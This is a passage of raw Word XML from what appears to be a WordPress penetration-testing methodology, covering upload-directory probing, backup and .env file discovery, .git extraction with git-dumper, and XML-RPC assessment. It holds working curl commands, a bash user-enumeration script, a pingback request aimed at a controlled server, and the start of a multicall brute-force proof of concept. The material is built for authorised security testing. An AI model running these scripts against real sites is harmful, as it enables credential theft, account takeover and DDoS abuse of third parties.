        <w:t>3.7 Uploads Directory Assessment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Configuration Check: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Test default upload directory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-sI https://target.com/wp-content/uploads/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tee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evidence/uploads_headers.txt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Check for directory listing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https://target.com/wp-content/uploads/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"index of"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Test common upload structure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for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year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in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{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2023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..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2026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}; </w:t>
      </w:r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for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month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in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{01..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12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}; </w:t>
      </w:r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url=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"https://target.com/wp-content/uploads/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$year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$month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code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=$(curl -s -o /dev/null -w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"%{http_code}"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 $url)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[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proofErr w:type="gramEnd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$code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==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"200"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]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&amp;&amp;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$code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-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</w:t>
      </w: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url</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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done</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsid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lastRenderedPageBreak/>
        <w:t>done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tee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evidence/uploads_structure.txt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0369D" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D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Security Headers Test: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Upload a test file path and check execution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NOTE: Only theoretical - don't actually upload without explicit permission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Check if PHP execution is disabled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-sI https://target.com/wp-content/uploads/test.php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Look for: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X-Content-Type-Options: nosniff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Content-Type: application/octet-stream (good - not executing)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Content-Type: text/html (bad - PHP might execute)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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>3.8 Backup &amp; Configuration File Discovery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Common Backup Patterns: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Create a wordlist of common backup files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backup_wordlist.txt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&lt;&lt;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'EOF'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wp-config.php.bak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wp-config.php.old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wp-config.php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~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wp-config.php.save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wp-config.php.swp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wp-config.txt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wp-config.php.1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backup.zip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backup.tar.gz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wordpress-backup.zip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site-backup.tar.gz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dump.sql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database.sql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wordpress.sql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.wp-config.php.swp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.git/config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.env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.htaccess.bak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lastRenderedPageBreak/>
        <w:t>EOF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Test each backup file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while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read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file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; </w:t>
      </w:r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code</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=$(curl -s -o /dev/null -w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"%{http_code}"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 https://target.com/$file)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$code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-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$file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done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backup_wordlist.txt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tee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evidence/backup_file_scan.txt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Any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200 response is a critical finding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Git Repository Exposure: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Check for .git directory exposure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https://target.com/.git/config -o /dev/null -w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"%{http_code}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\n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If 200, this is a CRITICAL finding - you can reconstruct entire source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Tool for extraction (use carefully):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git-dumper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https://target.com/.git/ ./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extracted-repo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Environment Files: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Common in modern WordPress setups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https://target.com/.env -o evidence/env_file.txt -w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"%{http_code}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\n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If 200, check for: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Database credentials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API keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A513D9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- Secret keys/salts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A513D9" w:rsidRDefault="00A513D9">
      <w:pPr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</w:pPr>
      <w:r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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="00A513D9" w:rsidRDefault="00C0369D" w:rsidP="00A513D9">
      <w:pPr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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4. XML-RPC FULL ASSESSMENT (DETAILED)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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.1 XML-RPC Introduction &amp; Risk Context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What is XML-RPC?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Legacy XML-based API for remote procedure calls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Enabled by default in WordPress &lt; 3.5, optional but common in modern versions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Commonly used by mobile apps, third-party publishing tools, pingbacks</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Powerful but often unnecessary for modern WordPress sites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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Why It Matters:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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No rate limiting in WordPress core</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Supports authentication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Can be abused for brute-force amplification</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Pingback feature can be weaponized for DDoS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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User enumeration without authentication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fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.2 Detection &amp; Initial Assessment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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Step 1: Confirm XML-RPC Availability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eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang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Basic GET request (should return error or 405)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https://target.com/xmlrpc.php -o /dev/null -w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"GET: %{http_code}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\n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Proper POST request with listMethods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-X POST https://target.com/xmlrpc.php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-H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"Content-Type: text/xml"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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version="1.0"?&gt;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methodCall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methodName&gt;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system.listMethods&lt;/methodName&gt;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params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&gt;&lt;/params&gt;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&lt;/methodCall&gt;'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evidence/xmlrpc_listMethods.xml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Check the response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evidence/xmlrpc_listMethods.xml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-o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'&lt;string&gt;[^&lt;]*&lt;/string&gt;'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sed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's/&lt;[^&gt;]*&gt;//g'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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Expected Responses &amp; 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2653"/>
        <w:gridCol w:w="1755"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03A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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="fr-FR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:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03A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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="fr-FR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1B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03A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fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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3AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>XML with method list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Enabled, no restrictions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>MEDIUM-HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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3AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03A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&lt;methodResponse&gt;&lt;fault&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Enabled but restricted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>LOW-MEDIUM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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3AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>HTTP 403 Forbidden</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Blocked by security plugin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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3AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>HTTP 405 Method Not Allowed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Disabled at server level</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidTr="001B0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3AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>Connection timeout/refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>WAF or firewall blocking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B03AE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:lang w:eastAsia="fr-FR"/>
              </w:rPr>
              <w:t>INFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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b/>
          <w:bCs/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Step 2: Save Complete Method List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eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang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Pretty-print the methods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evidence/xmlrpc_listMethods.xml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-o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'&lt;string&gt;[^&lt;]*&lt;/string&gt;'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sed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's</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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/&lt;string&gt;//g; s/&lt;\/string&gt;//g'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sort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evidence/xmlrpc_methods.txt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Count available methods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method_count=$(</w:t>
      </w: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wc</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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 -l &lt; evidence/xmlrpc_methods.txt)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"Total XML-RPC methods available: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$method_count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**Common High-Risk Methods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`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system.multicall       - Allows multiple calls </w:t>
      </w:r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in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one request (brute-force amplification)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pingback.ping          - Used </w:t>
      </w:r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for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DDoS reflection attacks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wp.getUsersBlogs       - User enumeration with valid credentials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wp.getUsers            - Direct user enumeration (rarely available)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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.3 Method Enumeration &amp; Functionality Mapping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Test Each Critical Method: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A. system.multicall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Test if system.multicall works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-X POST https://target.com/xmlrpc.php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-H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"Content-Type: text/xml"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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version="1.0"?&gt;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methodCall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methodName&gt;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system.multicall&lt;/methodName&gt;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params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param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value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    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array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data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value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struct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member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  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name&gt;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methodName&lt;/name&gt;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      &lt;value&gt;&lt;string&gt;system.listMethods&lt;/string&gt;&lt;/value&gt;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    &lt;/member&gt;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  &lt;/struct&gt;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&lt;/value&gt;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&lt;/data&gt;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&lt;/array&gt;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&lt;/value&gt;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&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;'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evidence/xmlrpc_multicall_test.xml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successful, you can chain multiple calls - this enables brute-force amplification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B. pingback.ping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Test pingback functionality (use a server you control for target)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-X POST https://target.com/xmlrpc.php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-H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"Content-Type: text/xml"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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version="1.0"?&gt;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methodCall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methodName&gt;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pingback.ping&lt;/methodName&gt;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params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&lt;param&gt;&lt;value&gt;&lt;string&gt;https://your-controlled-server.com/test&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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&lt;param&gt;&lt;value&gt;&lt;string&gt;https://target.com/some-post/&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;'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evidence/xmlrpc_pingback_test.xml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Check your server logs for incoming request from target.com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This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proves the server can be used as DDoS reflection/amplification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C. wp.getUsersBlogs (requires valid credentials)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Test with guessed/known credentials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-X POST https://target.com/xmlrpc.php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  -H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"Content-Type: text/xml"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'&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version="1.0"?&gt;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methodCall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methodName&gt;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wp.getUsersBlogs&lt;/methodName&gt;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params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param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&gt;&lt;value&gt;&lt;string&gt;admin&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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param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&gt;&lt;value&gt;&lt;string&gt;password123&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;'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evidence/xmlrpc_getUsersBlogs.xml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Response analysis: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Valid credentials: Returns blog information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- Invalid credentials: &lt;name&gt;faultCode&lt;/name&gt;&lt;value&gt;&lt;int&gt;403&lt;/int&gt;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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.4 User Enumeration via XML-RPC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Why This Works:</w:t>
      </w:r>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> WordPress XML-RPC returns different error messages for:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Invalid username (username doesn't exist)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Invalid password (username exists, password wrong)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Enumeration Script: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E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>bin/bash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xmlrpc_user_enum.sh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URL=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"https://target.com/xmlrpc.php"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USERLIST=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"users.txt"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="00FB6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708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Create a test user list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$USERLIST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&lt;&lt;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'EOF'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admin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administrator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test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demo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user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webmaster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EOF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"Testing XML-RPC user enumeration on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$URL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"=========================================="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while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read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username; </w:t>
      </w:r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response</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=$(curl -s -X POST $URL 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    -H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"Content-Type: text/xml"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    -d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"&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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?xml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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version=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\"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1.0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\"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?&gt;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methodCall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methodName&gt;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wp.getUsersBlogs&lt;/methodName&gt;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params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   &lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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param</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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&gt;&lt;value&gt;&lt;string&gt;$username&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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param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&gt;&lt;value&gt;&lt;string&gt;InvalidPassword123!&lt;/string&gt;&lt;/value&gt;&lt;/param&gt;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&lt;/params&gt;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&lt;/methodCall&gt;"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Check for "Incorrect username or password" vs specific error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$response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-q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"Incorrect username or password"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; </w:t>
      </w:r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"[+] VALID USER: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$username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elif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$response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-q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"faultCode"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; </w:t>
      </w:r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fault</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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=$(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"$response"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 | grep -o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"&lt;int&gt;[0-9]*&lt;/int&gt;"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 xml:space="preserve"> | sed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's/&lt;[^&gt;]*&gt;//g'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"[-] Invalid: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$username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(Fault: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$fault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)"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else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"[?] Unknown response for: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$username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sleep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1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Rate limiting - be respectful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done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$USERLIST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"=========================================="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"Enumeration complete. Valid users saved to valid_users.txt"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Run and Document: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chmod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+x xmlrpc_user_enum.sh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./xmlrpc_user_enum.sh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|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tee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evidence/xmlrpc_user_enumeration.txt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1B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>4.5 Brute-Force Amplification Testing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Understanding system.multicall Abuse:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Normal brute-force: 1 request = 1 password attempt</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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With system.multicall: 1 request = up to 1000+ password attempts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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This bypasses basic rate limiting that counts requests, not authentication attempts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lastRenderedPageBreak/>
        <w:t>Proof-of-Concept (Limited Testing):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E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:ascii="var(--font-mono)" w:eastAsia="Times New Roman" w:hAnsi="var(--font-mono)" w:cs="Courier New"/>
          <w:color w:val="E45649"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>bin/bash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xmlrpc_bruteforce_poc.sh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CAUTION: Use with extreme restraint (max 5 passwords)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URL=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"https://target.com/xmlrpc.php"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USERNAME=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"admin</w:t>
      </w:r>
